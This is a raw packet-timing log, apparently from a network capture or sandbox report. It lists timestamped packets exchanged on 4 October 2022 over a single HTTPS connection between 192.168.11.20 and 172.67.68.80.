                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966376066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966461897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966511965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966525078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966669083 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966675997 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966737032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966751099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966777086 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966907978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966916084 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966990948 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967020035 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967027903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967190027 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967283964 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967298031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967361927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967370033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967438936 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967506886 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967519999 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967618942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967677116 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967684031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967767000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967777967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967906952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.967914104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968036890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968043089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968116999 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968307972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968415022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968424082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968513966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968719006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.968775034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.969099045 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080475092 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080498934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080519915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080543041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080688953 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080800056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080847979 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.080952883 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081212997 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081237078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081269979 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081506014 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081597090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081628084 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081928968 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.081963062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082068920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082174063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082205057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082295895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082325935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082659006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082695007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082760096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082779884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.082870960 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083221912 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083236933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083457947 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083551884 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083869934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.083892107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084199905 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084223986 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084239006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084538937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084582090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084736109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084768057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084794998 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084808111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.084986925 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085136890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085182905 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085201979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085546017 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085575104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085730076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085782051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.085803032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086168051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086317062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086348057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086394072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086561918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086791039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.086977959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087018967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087064981 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087418079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087461948 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087613106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.087649107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088037014 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088074923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088234901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088327885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088560104 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088582993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088608027 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088711023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088908911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088934898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.088968039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.089240074 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.089317083 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.089504957 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.089528084 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.089876890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090025902 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090070009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090164900 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090250969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090558052 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090579033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090723991 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090791941 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090918064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.090960026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091269016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091285944 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091420889 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091521025 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091545105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.091872931 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092070103 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092097998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092159986 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092508078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092580080 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092755079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.092801094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093055964 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093149900 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093300104 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093462944 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093547106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093632936 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093880892 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093913078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.093956947 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094186068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094216108 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094229937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094592094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094621897 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094666004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094752073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094804049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094924927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.094959021 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095200062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095366955 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095386028 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095416069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095531940 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095562935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095709085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095740080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095782042 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.095974922 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096127033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096157074 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096189022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096324921 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096417904 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096471071 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096488953 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096663952 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096854925 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096932888 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096968889 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.096977949 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097105980 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097136021 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097248077 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097289085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097325087 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097337008 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097487926 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097592115 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097646952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097656012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097685099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097812891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097913980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097928047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.097956896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098056078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098181963 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098243952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098274946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098284960 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098391056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098449945 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098489046 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098566055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098633051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098660946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098731995 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098762035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098800898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098901987 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098921061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.098983049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099034071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099097013 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099117041 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099133968 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099271059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099353075 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099406958 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099437952 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099622011 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099627018 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099657059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099678993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099775076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099797010 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099917889 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099930048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099967003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.099981070 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100075960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100076914 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100230932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100250959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100274086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100313902 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100332022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100423098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100441933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100501060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100565910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100579977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100601912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100673914 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100790024 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100853920 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100908041 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.100929976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101048946 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101095915 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101098061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101130009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101200104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101392984 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101394892 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101428032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101560116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101577044 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101655960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101675034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101703882 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101809025 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101926088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.101933002 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.102010965 CEST49835443192.168.11.20172.67.68.80
